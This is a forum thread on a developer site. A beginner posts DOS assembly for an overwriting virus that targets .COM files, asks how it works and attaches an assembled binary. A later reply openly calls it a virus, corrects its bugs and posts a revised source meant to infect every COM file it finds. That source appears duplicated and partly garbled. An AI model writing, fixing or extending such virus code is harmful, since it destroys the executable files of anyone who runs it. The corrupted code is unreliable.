Member Avatar for eniwe

The lines of code below are borrowed from the print media. My focus is on the assembly; so by making use of these lines, iam trying to understand certain features of the assembly that are unclear to me. I was able to follow a few lines of code, and then going got tough.

.model small
.code
FNAME             EQU    9Eh
                  org    100h
Start:
                  mov    ah, 4Eh
                  mov    dx, offset  com_file
                  int    21h
search _lp:
                   jc    done
                  mov    ax, 3D01h
                  mov    dx, FNAME
                  int    21h
;
                 xchg    ax, bx
                  mov    ah, bx
                  mov    cl, 42
                  mov    dx,100h
                  int    21h
;
                  mov    ah, 3Eh
                  int    21h
                  jmp    search_lp
Done:
                  Ret

Com_file           db     ‘*.com’ , 0     
End start

The plan in the lines below is to *search for a .COM file so the Register must be set up before the Interrupt service routine is used to seek the help of DOS.

mov   ah, 4Eh
mov   dx, offset  com_file
int   21h.

1. A value 4E hex is moved to ah register
2. The offset is moved to register DX
3. Interrupt service routine 21h used.
Result being successful, carry flag CF is set to 0, so the execution doesn’t jump to DONE but continues to next line; which is trying * To open the found file :

mov   ax, 3D01h
mov   dx, FNAME
int   21h

1. Now, 3Dh is moved to ah, and 01h to al
2. FNAME is moved to dx
…………………………….......Well, this is where I encountered my own interruption.

DX must point to the address of the file in memory, the file we have located ;the file that we want to open. How does that address (of the file that we want to open) is linked to a label!! How the FNAME is used here in this context is what that escapes me… Be kind enough to explain to enlighten the obscure part in my understanding...thank you.
Regards…

  • 3 Contributors
  • 4 Replies
  • 207 Views
  • 1 Year Discussion Span
  • Latest Post Latest Post by Mattye134

Recommended Answers

All 4 Replies

Member Avatar for eniwe

…..The tough get going..
But for lesser earthly ones like me, it’s tough all the way.
Your tip on the location where the actual filename of the found file will reside is well appreciated. But, I must confess that I could not make much headway in that direction especially with DTA.

So, in the meantime I tried to assemble the file and noticed few typing slip-ups which I corrected as:

mov       dx, offset  search
                 int       21h
;
open:
                  jc       done
                  mov      ax,3D01h
                  mov      dx, FNAME
                  int      21h
;
                  xchg     ax,bx
                  mov      ah, 40h
                  mov      cl, 42
                  mov      dx, 100h
                  int      21h
;
                  mov      ah, 3Eh
                  int      21h
                  jmp      open
Done:
                  Ret

search       db       " *.COM" ,0

I am attaching the assembled .exe; I don’t have any isolated environment to test it. So, if you find it worthwhile to open it, may be you could let me know the result of running the file.(iam sure you dont need to run it to know the result!!)

xchg ax,bx
For the moment, would you care to tell me the purpose of the above line of code?

Regards...

a.zip (0.22 KB)
Member Avatar for eniwe

I had this file find.exe assembled using tasm

.model small
.code
FNAME     EQU   9Eh
          org   100h
start:
          mov   ah, 4Eh
          mov   dx, offset comfile
          int   21h

;if search is successful,search function formats 43 bytes of data in DTA.

searchresult:
          jc   done            ; search successful,and CF is 0=No jmp
 
          mov   ax,3D10h            ;3D=open  ;10h=read/write
          mov   dx,offset FNAME          ;data in DTA provides the name  
                                             ;of the file found.
          int   21h

;if successful,dos will return a handle in ax

          xchg ax,bx        ;So,bx gets file handle from ax.
          mov  ah,40h    
          mov  dx,100h      ;ds=data to write                         
          mov  cl,42        ;cx=number of bytes to write
                         
;We have, AH = 40h ;BX = file handle;CX = number of bytes to write DS:DX -> data to write
          int  21h

          mov  ah, 3Eh       ; close the file
          int  21h
done:
       ret
;
comfile      db  "*.COM",0
       End start

---------------------
i had another file ab .com linked using (tlink ab.obj /t) in the same directory with the following lines:

.model tiny
.code
          org 100h
;
start:
          mov dx, offset hello
          mov ah, 09h
          int 21h
;
          mov ax, 4c00h
          int 21h
;
hello  db  "Seem to have no effect on me $ "
          end start

---------------------
By running find.exe in the same directory as that of ab.com, i was expecting to see the ab.com gets altered. But nothing ever happened !!
Where did I go wrong???
How do i make certain if this finder file has found the ab.com at all?
DTA??
how do i locate DTA ??
please provide some information that is a little easier for this beginner, learner to grasp

Regards...

Member Avatar for Mattye134

I guess your trying to make a virus. You have a few mistakes I'm your code.
First off on your mov ah, 4eh, cx needs to be loaded with a file value(hidden,archive,r/o)
when you open a file, yes you do move ah, 3d, however 10h is not valid for al. You want al to be loaded with 02h(read&write). Last off you need to change cx to the size of the virus.
A few last words before I give you a source, this virus you tried to write will only infect the first file found also you need your virus to be com in most cases if you want to infect com's.

start: mov ah, 4eh lea dx, comfile XOR cx, cx next: int 21h jnc open jmp exit open: mov ax, 3d02h mov dx, 9eh int 21h xchg ax, bx infect: mov ah, 40h lea dx, start mov cx, vend, start int 21h mov ah, 3eh int 21h search: mov ah, 4fh jmp next exit: int 20h comfile db[code=c]
start:
mov ah, 4eh
lea dx, comfile
XOR cx, cx
next:
int 21h
jnc open
jmp exit
open:
mov ax, 3d02h
mov dx, 9eh
int 21h
xchg ax, bx
infect:
mov ah, 40h
lea dx, start
mov cx, vend, start
int 21h
mov ah, 3eh
int 21h
search:
mov ah, 4fh
jmp next
exit:
int 20h
comfile db

Be a part of the DaniWeb community

We're a friendly, industry-focused community of developers, IT pros, digital marketers, and technology enthusiasts meeting, networking, learning, and sharing knowledge.